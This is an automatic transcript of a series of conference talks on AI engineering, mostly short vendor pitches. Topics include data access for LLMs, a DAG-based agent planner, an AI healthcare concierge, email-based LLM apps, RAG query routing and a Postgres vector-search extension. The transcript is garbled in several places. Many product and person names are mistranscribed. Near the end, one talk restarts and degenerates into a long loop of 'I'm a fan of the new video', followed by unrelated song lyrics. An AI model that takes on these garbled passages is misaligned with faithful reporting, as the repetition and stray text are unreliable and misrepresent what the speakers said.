So again, this is sort of like the most engaged, excited customers right now. And then very soon, we're releasing these kind of high-level components. We have this Convex components framework, which kind of encapsulates whole state machines in these building blocks so you can easily drop into your app to have your back-end encompass these sophisticated workflows that we've co-developed with customers very easily and rapidly.

So anyway, that's us. If you're building something cool and generative AI and you want to sort of ship with confidence and quickly, check us out at Convex.dev. Thank you. Thank you. I walked away with that. Okay. Ladies and gentlemen, please welcome to the stage, CEO of Hasura, Tanmay Gopal.

Hey, everybody. So nice to be here. All right. So let's see if we can get this going. Cool. I'd originally titled this talk, "Connect real-time data to your AI," et cetera, et cetera. But really, it's more existential, right? The AI overlords are coming for us. And to help them be good rulers, to help us, let's just give them the data they need so that, you know, they can do a good job, right?

Hopefully, this talk is going to be the simplest talk that you heard at this conference. If it's not, I'll go back to using GPT-4 for coding instead of Sonnet. But the real pain that I have as I work with LMs is that they can ride a flappy bird for me with my face going up and down in 30 seconds, but they can't talk to my data intelligently.

It's really stupid. If I want to connect it to my calendar, and I just want to say, how many one-on-ones did I have last week? What's a good number to have with my team given their roles? Help me stagger them better and plan it out. I want to connect it to my sales force and say, why is this deal with Acme stuck in stage three?

And I needed to do the right thing. I needed to figure out the things between stage two and stage three in my sales pipeline and tell me why that particular deal is blocked. I wanted to connect to my tickets and my product data and say, is this ticket from an enterprise customer?

What's the name of their project? Can you tell me, like, what the status of that project is and what part of the product funnel this project is in? I went to Amazon today in the morning, and they have this Rufus thing. And I was like, okay, cool. Is this product?

I'm going to tell you what that product is in a second. But is this product available for one-day delivery at my Harrison Street address? Right? And just doesn't, like, what is this? Right? Like, it's right here. Just do it. And it doesn't work. And you all know why it doesn't work.

Right? There's, like, a death by a thousand cuts, and it's not secure. And I don't want to connect my calendar and make it into a GPT. Who even knows what the GPT is doing with this? Right? Like, it's scary. And it doesn't work. So we solved this with a pretty simple idea, which is that you take your live data and business logic, and you make that available as a tool to your LLM.

No shit. It's not surprising. Right? It's easy. Because -- and we did a bunch of things that makes it work really, really well. Right? Let's see if we have time for a quick live demo here. Let me see if I'm connected to the internet, which I am. All right.

I'm going to zoom this up. All right. So, I am a blockbuster, because, obviously, services businesses are the most important businesses now, and, like, movie streaming businesses are going to go nowhere. in the AI world that is to come. And so, in my blockbuster database and transactions and all of this stuff that I have going on, I want to ask my data question and say, "What helped me write an email to my top customer, thanking them for their patronage?" quote, "Mention some recent movies they watched." Right?

Straightforward request. I have all this data. I just needed to do the right things. And I needed to write an email for me. Right? And it works. And it works despite the fact that it's going to two or three different places and getting data from them. And it works pretty well.

It handles all kinds of situations. And I'm going to talk to you about three key ideas about how it works. And hopefully that's going to be useful to you as well. So, the first is this idea for unified query language. Whether you're talking to structured data or unstructured data or APIs, what if your LLM could talk to everything the same way?

Right? LLMs don't know what your API is. If you're a little honest with yourself, you probably don't know what your API does. Right? But LLMs know what SQL is. Right? Because when you say select star from x where id greater than 1, greater than has a semantic meaning that is embedded in the language.

That in your API, that URL param, who knows what it means? Is it greater than or equal to? Is it greater than but actually only works with Boolean? I don't know. Right? But it works with SQL. Because LLMs know what that SQL is. Right? So the first part of this is, let's just make everything one query language and deal with that.

The second is an object model for authorization. Right? Which is, again, kind of blows my mind of why it's so complicated. Look, I don't care where the data is coming from. The data has a schema. Right? It's a property of the data and it's a property of the session.

And then just run the rule. And maybe there's a hundred rules, but it should just work. And then however it gets accessed, it's fine. Right? I should be able to use this wherever it's used, however it's accessed, the same authorization should be applied. So that's idea number two. And that's kind of embedded there as well.

The third, and this is kind of interesting, is to get the LLM to figure out the plan to access data by itself. We don't have to hard code it and we don't have to do the work. And then you're like, Tanmay, listen, what are you smoking, man? LLMs can't even reason.

I can't even get it to count the number of r's in strawberry. What are you going to do with, how are you going to make me fetch all of this data from three or four different places and disambouille and whatnot. And we're like, you know what, there's a really simple fix to this problem.

But let me ask you a live question. How many of you can count the number of i's in supercalifragilisticexpialidocious? Can you? You can't, right? You're being mean to the LLM by asking it such questions. Don't be mean to the LLM. Set it up for success. Ask it to write Python code to solve the problem, and it works.

And that's it. So when you're asking, and when we're asking our LLMs to figure out how to retrieve data, we just ask it to run Python code to fetch the data we want. So if the AI singularity is coming, get ready for the data singularity, put everything together. If you're doing AI, you need access to data.

If you're doing data, and you wish that it could talk to your AI. If you have AI and data, and you need to get to talk to each other, come visit us at our booth. Everything's in the open at hustler/bacha.ai. Talk to you folks soon. Thank you for your time.

Ladies and gentlemen, please welcome to the stage, CEO of Hypermode, Kevin Van Gundy. Before Hypermode, I worked at Purcell. We had an office down the street above a pizzeria, and we had three big problems. One, we were losing to other JavaScript frameworks. Two, we were losing badly to other hosting providers.

And three, I was losing to my diet of exclusively pepperoni pizza. Eventually, we started to win, not because we were smart, or we knew all the right answers, but because we dealt this core competency of iterating really, really, really quickly. We didn't know the optimum strategy, but we figured if we just tried more things faster than everyone else, we'd eventually be able to adapt and figure out the right products and strategies to figure out what the market wanted.

Iteration is the compound interest of software. Keep doing it long enough, and eventually, really good stuff starts to happen. Because we tried a lot of things really quickly, we eventually figured out two things. One, developers want to incrementally adopt new technologies. And two, they don't want to commit to architectural patterns before they know how their application is actually going to work.

But iteration can't happen if you're afraid of getting it wrong. The same thing that has held back web is also holding back AI. And if I'm honest, there are even more things for us to get wrong about Gen AI. When I think about it, I'm grossly overwhelmed. What's the right hardware?

What's the right model? What's the right prompt? How do I integrate? How do I monitor? How do I improve? Everyone here knows a horror story of someone with a runaway bill, a hallucinating chatbot, a project that took months and months and never delivered any value. And in the end, we need to build systems that de-risk getting it wrong.

Because we are going to get it wrong a lot. Picking the wrong model doesn't matter if there's no friction to switching it out. Integration is simple when your classical systems and your AI systems use the same APIs. You can fearlessly make changes to prompt strategies, data mixes, if you can trace that inference step by step by step.

At hypermode, we care deeply about making AI approachable. Everyone here should be able to put AI in their apps without specialized skills. At its core, hypermode is a runtime. It allows you to easily integrate models and data into AI functions. We then surround that runtime with a bunch of tools that make it easy for you to rapidly iterate and observe those AI functions in prod.

We make it easy to get started, incrementally adopt AI as appropriate, and then as your team develops those skills, reimagine those applications as AI native. First and foremost, we want to make the developer experience of developing with AI a lot less terrible. When it comes to adding a new model to your service, you probably don't want to read a bunch of pages of docs to figure out the temperatures on a 0 to 2 rather than a 0 to 1 or a 1 to 10.

Then with hypermode, we provide you type ahead and your favorite code editor right out of the box. No SDKs, nothing to download. Then when you do ship to prod, we give you strong defaults just to get started. Or if you have your own stack, bring it along. In either case, we'll remove a lot of that complexity for you.

For example, traditional RAG requires N+1 requests. You need to make an additional call to embed the inputs, go talk to your vector store. With hypermode, you can do that all in one request. We've built an in-memory embedding and search service that will allow you to do that and save a couple hundred milliseconds per request.

Finally, building intuition around non-deterministic systems is hard. Each model has its own personality, and we make it really easy for you to quickly compare different inferences, different tunes, different models. And you can then export this data set to fine tune. On Monday, your boss is going to ask you, what did you learn at AI World Fair?

If you come by our workshop after lunch, I'll prove to you that you can make AI-- Ah, sorry. I'll prove to you that you can make iteration velocity a core competency. The team that built all this amazing stuff will be there. We'll show you how to build natural language search, intelligently sort every data list in your product, detect outliers, catch bad guys.

You'll walk over the demo that you're proud of and a plan to put something like it in prod by the end of next month. And if seeing my happy face again and building something really cool is not enough, we'll give you $1,000 in hypermode credits to get started. Thank you all so much.

Ladies and gentlemen, please welcome to the stage, VP of AI R&D at Hyperspace, Nicholas Schlapper. Hello, everybody. My name is Nicholas Schlapper. I'm an AI engineer. I think I'm at the right place. Today, I'm going to be pronouncing a new product we've been working on at Hyperspace. A little bit about us.

We are a decentralized AI network. We have no GPUs. We're building a community who takes the resources from their personal computer and contributes to our decentralized network. We have a product currently out called AIOS. You can download it for Windows and Mac. It uses Lama CPP and does inference.

So technically, you can download it, get inference from somebody in Belgium, and you can have a chat experience like that. So we're hoping to -- oh, actually, sorry. We really believe in diverse models. We think not having just one big closed-source model is the answer for the best AI experience.

Having a mixture of a bunch of great experts will provide the best AI experience. So that gets us to our self-titled product, Hyperspace, which will be built on our network. This is a really interesting product. It's a mix of prompt engineering, visual React flow, Python execution, and RAG-like web browsing.

So for the first thing with this product, we wanted to build a fine-tuned model that outputted agentic planning experiences. So you put in a query, you get in a DAG -- or you get out a DAG in a JSON format. And this is a methodical plan from that query.

We also wanted to have a primitive of having an in-house web scraping experience for LLMs. So we're using Puppeteer and Beautiful Soup to scrape websites, convert that HTML into a markdown, something easier to read for LLMs, to digest. Kind of the product we're going to talk about is we have a node editor in a terminal, and this is going to be a power tool for the power users.

This node editor will allow you to change each node in the React flow to fit your needs. And this is coming from the DAG orchestration model we have. Here's a little video demo of our product. I recorded it yesterday in the hotel, so I'm sorry for the audio. And here we go.

Welcome to a very early look at Hyperspace. Let's begin with a sample query. Once you submit your query, you're brought into our node editor view, where each node is streamed in from our DAG orchestration model, HyperEngine V3. We want to emphasize that the user is still in full control.

They can edit the title, task description, and expected output. They also have the freedom to add as many nodes as they like. Let's execute. Now that our outputs are done, we can talk a little bit about the outputs. Each output is coming from each node, and each node is creating a query based on that task.

It's combining the overall goal, the local goal, and whatever's happened in the previous node. We're using a reasoning model and a summarization model. For reasoning, we're using quen2 instruct, and then for summarization, we're using llama370b. This helps provide a diverse set of synthesized answers. For the outputs that do have Python, we can go ahead and run them and see them in our terminal.

Terminal will automatically open it up with the output. We want to provide the groundwork for agentic behavior in the future by providing these core primitives. Over here on our right, we have our virtual file system that changes our directory. We're trying to build out all the primitives to what an agent would need, memory, Python execution, planning, and code generation.

Thank you so much for watching. We're very excited to get this out in the coming weeks. Happy to announce that it will be available later this week via wait list. So go ahead and pay attention to our Twitter. Hyperspace AI. All right. Thank you. That's my time. Ladies and gentlemen, please welcome back to the stage your host and co-founder of the AI Engineer Summit.

Benjamin Dunphy. Benjamin Dunphy. All right. How are we feeling? Was that a good keynote opener? Are you guys awake yet? All right. Can we have a round of applause for opening keynote speakers, please? What a way to kick off the day. We are now heading into the breakout portion of the day.

So let's review all the tracks that we're featuring today. So AI is not just for startups with nothing to lose. It is being adopted at scale and at speed in the largest household names in the world. Bian is CTO of Sourcegraph, which has been building enterprise scale developer tools for over a decade.

And is now building Cody, where he is a co-founder of and his CEO is also presenting in the Cogen track. But for the AI and Fortune 500 track, come join Bian and his speakers in Golden Gate B just up the escalators. Next, we have RAG, which is the workhorse of AI engineering.

And there is a lot of detail to get right from vector databases to re-ranking. Freddie was a machine learning engineer at GitHub and is now CTO and co-founder of Quotient AI, which helps with rapid RAG development through evals. Join him in salons 2 through 6 outside the doors behind you and to the left starting at 11:15.

Code Gen and DevTools. Their productivity boost of software 3.0 derives most from combining software 1.0, code, and software 2.0, models. As engineers, we are best at accelerating ourselves. Brittany spoke at the AI engineer summit last October and is one of the DevTools investors at CRV. We'll be putting up an air wall to split this room in just a bit.

So, attend those sessions right here in Salon 7 starting at 11:15. Frontier models are sexy, but open models are the ones you can take home and make your own. Greg is CEO of Oxen.ai, where among many responsibilities, he runs the archive deep dives paper clubs that cover many of the open models and fine tuning techniques this track offers.

Join him right here in Salon 8 after the break. Last but not least, the AI leadership track addresses the growing needs in leading teams of AI engineers. From platform engineering, to eval frameworks, to GPU cost optimization, and case studies from weights and biases, to Khan Academy, to Neo4j, to OpenAI.

You may be familiar with Peter from his newsletters like Ruby Weekly and JavaScript Weekly, but perhaps more relevant to today, he has emceed O'Reilly's Fluent Conf in this very hotel. Note that this is a track exclusive to folks with green lanyards and green badges. If there is room, at session start time, we can let in blue badge and blue lanyards, basically speakers.

Anyone else, please do not attempt to attend these closed door sessions, or you may be escorted from the premises. These are exclusive sessions. They paid for this. Please do not make us remove you from the building. These take place right across the hall in Nob Hill, B2D. So we'll take a short break, head to the expo sessions, which are taking place right over there, salons 10 through 15.

Head to the expo, meet with our sponsors, get some demos, and the breakout sessions will start promptly at 11:15. All right. Let's get to it, everyone. Bye. Bye. *music* *music* *music* *music* *music* *music* Hey, everyone. I'm Aditya Advani, an AI engineer based in San Francisco. Along with my teammates, I created Mathmatrix movies at a hackathon in SF on May 11th, 2024.

Today, I'd like to show you what our project can do because I think it's really cool. What it does is that it generates really cool math explainer videos in a truly unique style that is able to get concepts across visually. This is something that I think is really unique that you may never have seen before.

So AI hackers, let's start with a live demo. In our demo, I decided that perhaps we should talk about probability. This year, only 10% of the applicants for speakers at this AI engineers world's fair were accepted to speak on stage. I didn't make the cut. Which is why you're watching me on this recording.

Now there's no hard feelings, but I'm ambitious and so I want to try again for next year and the year after that. So let's assume that next year the acceptance rate for talks falls to 7%. Do my odds of getting in increase or decrease now that I didn't get in?

Also, if the year after that the acceptance rate is just 5%, what if my odds of getting in at least one of the two years? Now watch, I'm going to enter that as a prompt into Math Matrix movies. It's going to take that whole math problem and it's going to generate a great math explainer to explain the whole situation right back to us.

And at the end of this video, you're going to see what it's done. In the meanwhile, while that prompt is put in and it generates, let me show you a clip from one of our already published videos on sigmoid functions. Watch now how the math video explains how the shape of a sigmoid curve changes based on the equation used to draw it.

Check it out. Now, let's look at the math. Don't be scared, it's simpler than it looks. This is the formula for a sigmoid. It uses E, a special number like pi, and X can be anything we want. If we change the X part of the formula, we can move the curve around.

Here, we added a -2 and look, the curve shifted. We can do lots of cool things by changing this formula, but the S shape always stays the same. Crazy, right? So how does that work? Well, we have to thank the math educator genius, Grant Sanderson, a.k.a. 3Blue1Brown. Because he created all his amazing math videos by writing his very own math animation library in Python, and it's called Madden.

Under the hood, Madden uses a 2D graphics library called Kyro to generate most of the drawings and the animations. And then it uses the very powerful command line tool FFmpeg to combine those animations as well as voiceovers and other elements such as latex equations into compelling math videos. So here, in this case, you can check out the code for a simple movie where we try to animate 5 plus 3 equals 8 for six year olds by using two groups of five red apples and then three green apples and then combining them into one row of eight apples.

So let's see how Manim actually does this. So it's a simple block of Python code. For each section, there's a voiceover, which is created by Azure TTS and within that section within that scene, we actually are able to lay out the elements and, you know, enumerate them using an array and animate them and move them around all in one block of Python code.

So this one or one and a half minute movie that explains five plus three equals eight to six year olds is just maybe 30 lines of Python. And what we do in our project is we use Google's Gemini to actually generate this code. So if many of you are like me, you struggle with visualizing and contextualizing the math and algorithms behind the river of information flowing at us as AI engineers every day.

I often find myself wondering about something I read in the latent space podcast or saw on Twitter or talked about with a colleague. But I like I lack the right words or formulas to make my intuition like explicable and testable. And here, Math Matrix movies is like a godsend.

It's like you gave Google's Gemini a whiteboard and said, teach me at my level. In our user testing, we've given the kid to a seven year old and watch them generate movies over and over in different variations. Explain 22 times 22 to me with apples, with fish, with TVs.

So it's pretty crazy. It's an education hack that opens up a vista into how AI tutoring can enable accelerated learning of concepts. So now, let's take a look at the output of that prompt that we put in earlier. This is a slightly different version of the prompt. I just did it again because I lost that page.

So it's taken the prompt and it's created a video. It actually creates the video and then it watches the video again and improves it and studies it for overlapsed occlusions. Gemini's vision is good, but it's not great. It has a lot of gotchas. But let me show you what the final output is like and you know, with a few more iterations, it would get even better.

And as it is, this is pretty good. I'm going to increase the speed so that it goes pretty quick. Here's our final video for now. Rejected from AI engineers world's fair, sad face. But what about next year and the year after that? Let's assume the acceptance rate for talks falls to 7% next year.

Let's visualize this. Each square represents an applicant and there are 100 applicants in total. The green squares show the 7 applicants that get accepted. The year after, let's assume that the acceptance rate falls to 5%. Again, each square here represents an applicant and we still have 100 applicants. This time, only 5 applicants, shown in green, will be selected.

Now, let's calculate the probability of getting my talk accepted in at least one of the next two years. The probability of not getting accepted year 1 is 1 minus the probability of getting accepted, which is 7%. Similarly, the probability of not getting accepted in year 2 is 95%. The probability of not getting accepted in either year is the product of the two probabilities we just calculated, which comes out to 88.35%.

Finally, the probability of getting accepted at least once is 1 minus the probability of not getting in either year. That gives us a decent 11.65% chance. So, there's still a chance. Yep. See you on the stage. Brought to you by the power of probability. So, keep applying, keep learning, and who knows, you might just see me on stage next year.

Yep. Sure hope so. Hint, hint. Rejected from AI engineer. Cool. Well, I hope you guys enjoyed that. I'd like to thank Baladharikesh, Lily, and Justin for bringing this project to life with me. Thank you for your attention, and please check out our videos on YouTube and fill out your math video requests at httpsmath.auto.movie.

Thank you so much. Hello. Welcome, everyone. In this brief presentation, we will talk about how we are building an AI-powered healthcare concierge, and share some key tips and tricks that we learned while building the service. So, if you're interested in healthcare and AI, this is the right session for you.

To quickly introduce myself, my name is Achillesh Gupta. I've been the co-founder of Harness Care, and I've been in product and tech roles for the last 15-plus years. At Harness Care, our mission is simple. We have started the company with the goal of empowering everyone to navigate healthcare system with ease.

To really help reduce some of those barriers that people face while accessing care at the right time and at affordable prices. Now, we all know how complex the US healthcare system is, but to highlight a few points, there are roughly 100 million people who are under medical debt within US.

There are 55 million people who have some family caregiver responsibilities, but most of them find it difficult to manage the caregiving plus the work responsibilities they have. And most of us do not have sufficient healthcare literacy to really navigate the system or advocate for ourselves against the providers or insurance policies.

Now, many of those issues really prevent people or delay care, but what if we had a personalized expert in a concierge form to really reduce this burden and take care of various mundane tasks for care coordination? This can be as simple as getting quick answers regarding my benefits. This could be asking the concierge to find an available provider and the price estimates for the services.

Or this could be managing my out-of-network bills and filing the claims with insurance automatically. These are just a few examples that how this concierge can help improve the care journey for the patients and the caregivers. Now, this vision would have been impossible few years ago, but luckily with the regulatory and technology tailwinds, a lot of this is probably not possible.

The first is really the regulatory tailwinds in the form of improving data interoperability, which providers and insurance plans are required to make personal health records easily accessible and pricing data available. Now, there is also a slew of healthcare data aggregation platforms, which are using these standards and making data access cheaper and easier for many of the health tech startups.

And lastly, our heroes in the large language models, which can really generate insights from a mountain of this health data in unstructured, structured forms and perform tasks using the agents. The way we make this all work together right now is include three different components. One is the data aggregation and standardization.

So once we extract data from various different platforms, whether it's medical records, insurance plans, claims, or other data sources, we then normalize it using the LLMs to extract critical information from unstructured data or standardize it for our data stores and making it available to our AI concierge service. On top of that, the second big area is enriching our AI concierge with public knowledge bases.

These can be curated sources of information for medical terminologies, clinical resources to provide better guidance to the patients. And lastly, integrate with third party vendors to really perform common tasks, whether it's medication orders, looking at pricing records, scheduling appointments, or looking at financial assistance programs. And all this becomes available to the user through our AI concierge platform.

Now, there have been some critical, interesting learnings for us during this journey. The first one has been around rephrasing user prompts. We all know the quality of responses from LLMs really depends upon the quality of the prompts. But users don't often ask the detailed questions or may have typos for the prompts they are making.

Using LLMs, we can rephrase these, their questions and clarify the intent. For example, in this case, if a user says, is ER included, we could rephrase that using LLM to clarify that the question the user is asking for is emergency room coverage included in my insurance plan. That significantly improves the quality of RAG and also the LLM responses.

The second key learning we had was around preprocessing of documents to improving RAG. The large documents obviously take a lot more tokens and don't always work well during the vector lookups. What we do instead is really create structured summaries out of these large documents, depending upon if it's a clinical document or insurance policy document.

We create different summaries accordingly and that significantly improves the RAG accuracy for us while reducing the token usage as well. And lastly, the user experience. Users don't always know how to best use the AI tools. We do need to educate them with contextual suggestions. For example, in our case, we could recommend them different prompts when they're looking at medical records.

This could be if they want to look up side effects for their medications or diagnosis details, etc. But when they're looking at the coverage policy, we can show them guided prompts around coverage details. For example, for mental health services, ER visits, etc., the common issues people face. Or when they're looking at insurance claims, we suggest them different kinds of prompts to help them be more educated about the services and the use cases.

This definitely improves the overall engagement with the AI and the user satisfaction as well. We are always looking for passionate engineers to work on these problems with us. So if you're interested in what we are building or just want to brainstorm a few ideas, feel free to reach out to us.

Thank you so much. When ChatGPT first came out, GPT-3 had been available for two and a half years via an API. ChatGPT didn't blow up because of a new AI, but because of a new interface. And today if you look at the GPT wrappers that have gotten traction, they've either differentiated on interface or they brought the interaction closer to where the user already lives and works.

Cursor is my favorite example of this. I used to use ChatGPT to answer a lot of code questions, but I find it so much more valuable to have that LLM right there in my IDE. We've over-indexed a bit on Chat as the de facto interface for AI, and it's unquestionably proved useful in a lot of situations.

But I think there's still a lot of opportunity to experiment with different interfaces for different people and different use cases. And I think most folks are sleeping on email as an interface for LLM-based apps. My name is Greg Boggess, I'm the founder of HiHi Labs, and I've spent the last year building and experimenting with a whole bunch of email bots.

In the rest of this video, I want to first talk about why you might want to consider email as your interface. And two, I want to talk about how you can build your own email bot and some technical considerations you'll encounter along the way. And hopefully I can save you a little time by sharing some of the lessons that I've learned.

First, so why email? Email is ubiquitous and cross-platform. Back when I served on the developer relations team at Twilio, we used to say SMS is the only app that comes in pre-installed on every phone. But it's true of email as well, which is why Twilio eventually spent $3 billion to buy SendGrid.

Email is frictionless. I partnered with someone who works for a non-profit supporting public school principals. And we built this email bot that took classroom observation notes and helped principals write a first draft of a teacher evaluation that fit the Danielson framework. We started to get some traction and we said, okay, hey, would you like this as a web app?

And many of them said, no. I actually, I already have so many web tools that I have to sign into. Some of those apps work better on some machines than others. Sometimes there are restrictions on what websites we can and can't visit from within the school. But I can always send an email.

And also we found out that one way principals were finding out about the service was that their peers were forwarding them the results. Emails are easy to share. And because of this, email and email apps have a long history of going viral. One of the first apps I ever built, you can actually try it out if you want.

You can email start@adventuresinemail.com. And the basic idea here was like a choose your own adventure style interactive fiction that was bespoke that you could play with your friends by CCing them. I sent it off to my parents. I was like, hey, create a story about Hawaii. It's my parents' favorite place.

And I kind of went to bed. I figured I'd like see a couple of emails and I'd reply back in the morning. I woke up to 76 emails. And they had played so much that eventually the app crashed because I was hitting the token limit. And I don't think that they're ever really going to go to the GPT store and spend a lot of time on there.

But they're in their inboxes every day. Email meets people where they already are. So how do you build an email box? First, you're going to need a service that offers programmatic email. There's a bunch of these. I personally have been really enjoying Postmark. It's just a great, clean developer experience.

You're going to set up a few DNS entries. You're going to point your domain's inbound email to Postmark. Then Postmark will make an HTTP request to your app. I've used fast API for a lot of my apps. Super easy to set up an endpoint to receive that inbound request.

And the data about your email will just be stored in JSON. Then you're going to want some sort of background job like Celery because these generations take time. Which actually is a cool bit about email. It's async. So the user doesn't expect an immediate response. Email is actually a pretty good medium for more agentic processes.

Or you can actually just take advantage of that to use, say, batch processing and save a lot of money in your generations. You can even put a human in the loop. But however you do it, you're going to want some sort of background job that's going to do the processing.

That's going to create the generation. And then you'll use the API to send off your reply. These emails are considered transactional emails, not broadcast emails. So your deliverability rates are probably going to be a lot higher. Now, how do you structure your LLM? I think there's two things you've got to do here.

On your system message, it helps a lot to tell your LLM, hey, this is a conversation being conducted over email. I like to tell it to reply in plain text. And then if I want an HTML formatted email, I run that through a separate generation. The user message, I like to feed in some bits about the email in JSON.

The LLM does a really good job of interpreting that JSON and then spitting back just plain text for me. It is important to pass in the subject because a lot of users will just include important context about the message or the entirety of the message itself in the subject.

But of course, when you reply, you're just going to want to use the same subject so that you can take advantage of threading in the inbox. Speaking of threading, there's a couple of things you're going to want to do. One is to keep the subject the same. And the second is you want to set a reference header referencing the original message ID.

And this will help tell Gmail and other clients that they should include all these emails into a single thread. Eventually, you're going to have to figure out how you want to deal with conversations. The best way to do this is to use the mailbox hash. You know by now that you can add a plus after the first part of an email address.

You just want to generate some sort of unique identifier. And then when your app brings in the inbound message, you check to see if that's there. If the mailbox hash is not present, then it's a new conversation. If it is, then you can look it up, retrieve the messages and add them appropriately.

Also, one of the quickest way to get these apps out into the world is to use OpenAI's Assistant API. And you can use the thread ID that they give you as the mailbox hash. And then they give you a nice GUI that you can use to edit the system prompt and iterate quickly.

And I've actually gotten to a place where I could deploy prototypes using the Assistant API really quickly. I don't think it's the best for production apps at scale. But if you just want to get something out and start getting feedback from your users quickly, it's a really, really great way to go.

Again, my name is Gregg Boggess with HiHi Labs. You can find me online at GreggieB. If you want to learn more about this stuff, you can check out my blog, HiHi.ai. I've documented a lot of these learnings in more detail there. And if you've got any questions, just send me an email.

Hello. I'm Max, the CEO of CIT AI. And today I'm going to tell you why queries are all you need. RAG learnings from processing 3 billion tokens a day. One of the great things that you can do when you have actual volume across your pipelines is you can look at what types of queries and requests actually come through your system.

And what we quite quickly realize is that 68% of production queries are destined to fail with naive RAG. because only 32 are answerable just with semantic search. 22 are meta queries like give me the last 10 documents on this topic. Or they're off topic queries where the answer is not in the data store.

or they require more complex operations like comparisons, compare X and Y and give me an answer. Or they're just junk and other by which clunk up the system. So why is naive RAG so ineffective? It's because the query here, if that's an AI or a human, is unaware of retrieval capabilities and the data that is indexed.

They just ask for what they want and aware of if they can actually get an answer. And the lazy solution here is to give the query or context about the information that is stored and the ways that it can be retrieved. This is actually hard in practice because the information keeps changing.

So you need to update that context, that instruction or that prompt continuously. And it's also a lazy solution. After all, you don't have to read a manual to search the Internet. A better solution lets the query here ask for anything and tries to answer it in a best effort way.

This means that it takes a query, which is a natural language question, but also a wish list of how that perfect answer would look like. What is the metadata? What does it fulfill? Even if the fields and properties that are being asked for here don't actually exist in a single record in the data store.

This is completely independent. The query here can just ask for what they want. If it's a human, they can ask for whatever they want. But if it's an NLM, they can hallucinate arbitrary parameters to make this work. And if the system cannot answer the question, it refuses it politely.

So let's have a look at how such a solution actually works. So we have on the left side, we have the query and the wish list coming in. We have an embedder, an agentic router that generates a set of semantic queries, multiple semantic queries if necessary, and meta queries that use things like danger range sorting, sort by newest, sort by oldest and other properties.

And once those results come back from the data store, we pump it through a final question where it's, hey, does this actually help answer the question? And if it doesn't, then we refuse. And if it does, we give that answer back. And let's go back to our original example of these 10,000 sample queries across our systems from last month.

And we see above the line, 32% are answerable with just a semantic search. And then we have those other categories. And here we see that the 32% semantic are retained. And we now also cover those 10%, which are comparison questions by being able to route through multiple different semantic queries.

So for example, for us to compare between two different things, we would most likely route three different queries. Once asking for a compare X and Y, if there's an existing comparison in the data store, and then two different queries to retrieve context about the two different items being compared.

And in theory, the scales to any N items being compared. We also cover the meta questions, or we find a way to get closer to covering all of those meta questions. And we refuse in the cases where we cannot actually provide a good answer. The downside of this is latency and cost.

You can imagine that pulling everything through such a system is a expensive and b introduces quite a bit of lag. But you can actually solve for both of these through a lot of different techniques that we've developed internally and that we hope to share in the near future. Such as speculative retrieval embedding embedding based query routing, compressed embeddings, and a reduced query language to handle these meta queries better.

As well as lightweight schema-aware LLMs that know how to interact with the data store. If you're looking for a job and you love working on hard engineering problems at scale, always email me. And we're releasing our query and embedding pipeline for everyone in July 2024. We're really excited to see you try.

Postgres is the most popular database in the world, according to the 2023 Stack Overflow Developer Survey. And despite the myriad of specialized vector databases out there, Postgres is a top choice for many developers building AI applications. And that's thanks to PG vector. PG vector is an open source postrex extension for vector data.

It provides the ability to store and search vectors in Postgres and transforms a 30 year old relational database into a fully fledged vector database. And thanks to PG vector, Postgres has become one of the most widely adopted vector database for rag applications. And that's thanks to its ease of use, SQL support, and operational simplicity.

But the one question hanging over Postgres versus using specialized vector databases has been performance. And the reasoning goes like this. Dedicated vector databases have purposeful data structures and algorithms for storing and searching large volumes of vector data, thus offering better performance and scalability compared to general purpose databases with added vector support.

Well, I'm here to tell you that the good news is that the answer to the question about whether Postgres can scale for vectors is yes. Enter PG vector scale. PG vector scale is an open source postrex extension that builds on PG vector, enabling greater performance and scalability. My name is Aftar.

I'm a product leader for AI at timescale. We're a Postgres cloud database company. And I'm going to tell you about PG vector scale, the open source extension that we built to scale vector workloads on Postgres. We built PG vector scale for three reasons. First, to make Postgres a better database for AI.

Second, to challenge the notion that Postgres and PG vector are not performant or scalable for vector workloads. Thirdly, to give developers a way to keep using PG vector, but without any performance or scalability bottlenecks. PG vector scale is licensed under the open source Postgres license, and it complements PG vector rather than competing with it by leveraging the PG vector data type and distance functions, further enriching the Postgres ecosystem for building AI applications.

And by using PG vector and PG vector scale together, developers can build more scalable AI applications, benefiting from higher performance embedding search and cost efficient storage. Before I delve into the details of the technical innovations behind PG vector scale, let's answer the biggest question. How does it perform? To answer this question, my team compared the performance of Postgres with PG vector and PG vector scale installed against Pinecone, widely regarded as a market leader for specialized vector databases.

We used a benchmark of 50 million embeddings of 768 dimensions each. And here's the results. We found that with PG vector scale, Postgres gets 28x lower p95 latency than Pinecone's storage optimized index and 1.4 times lower p95 latency against Pinecone's performance optimized index on the same dataset. And thanks to the power of open source developers can get these results at 75% of the monthly cost when self-hosting.

Now, now that you've seen the numbers behind the performance, let's dig into how PG vector scale gets to these results. PG vector scale brings specialized data structures and algorithms for large scale vector search and storage to Postgres as an extension, helping deliver comparable and often superior performance and specialized vector data.

PG vector databases. It does this with two key innovations. The first is a new high performance cost efficient search index called Streaming Disk ANN. Inspired by research on brilliant scale vector search at Microsoft and improved on by timescales own researchers, Streaming Disk ANN overcomes limitations of in-memory indexes like HNSW or hierarchical navigable small worlds.

By storing part of the index on disk rather than entirely in memory, making it more cost efficient to run and scale as vector workloads grow. That ability to store the index on disk vastly decreases the cost of storing and searching large amounts of vectors since SSDs are much cheaper than RAM.

The second innovation is a new high accuracy quantization method called statistical binary quantization or SBQ for short. This is developed by researchers at timescale and this technique improves on standard binary quantization techniques by improving on accuracy when using quantization to reduce the storage space needed for vectors. More details about PG vector scale, its performance and how the technical innovations work can be found on the PG vector scale GitHub page.

But the key takeaway is that Postgres is scalable for vector workloads and thanks to PG vector scale, we can all be the guy on the right and just use Postgres for AI applications. Thank you. Hey everyone. I'm Aditya Advani, an AI engineer based in San Francisco. Along with my teammates, I created math matrix movies at a hackathon in SF on May 11th, 2024.

So AI hackers, let's start with a live demo. In our demo, I decided that perhaps we should talk about probability. This year, only 10% of the applicants for speakers at this AI engineers world's fair were accepted to speak on stage. I didn't make the cut, which is why you're watching me on this recording.

Now there's no hard feelings, but I'm ambitious. And so I want to try again for next year. I'm a fan of the new video. I'm a fan of the new video. I'm a fan of the new video. I'm a fan of the new video. I'm a fan of the new video.

I'm a fan of the new video. I'm a fan of the new video. I'm a fan of the new video. I'm a fan of the new video. I'm a fan of the new video. I'm a fan of the new video. I'm a fan of the new video. I'm a fan of the new video.

From every piece that's broken. Been trying to get back to myself. But don't have a clue. I'm looking for some luck. Can't find a door that's open. I'm losing all my hope. Feels like I'm left here in two. Because I'm missing you. Because I'm missing you. Oh, because I'm missing you.

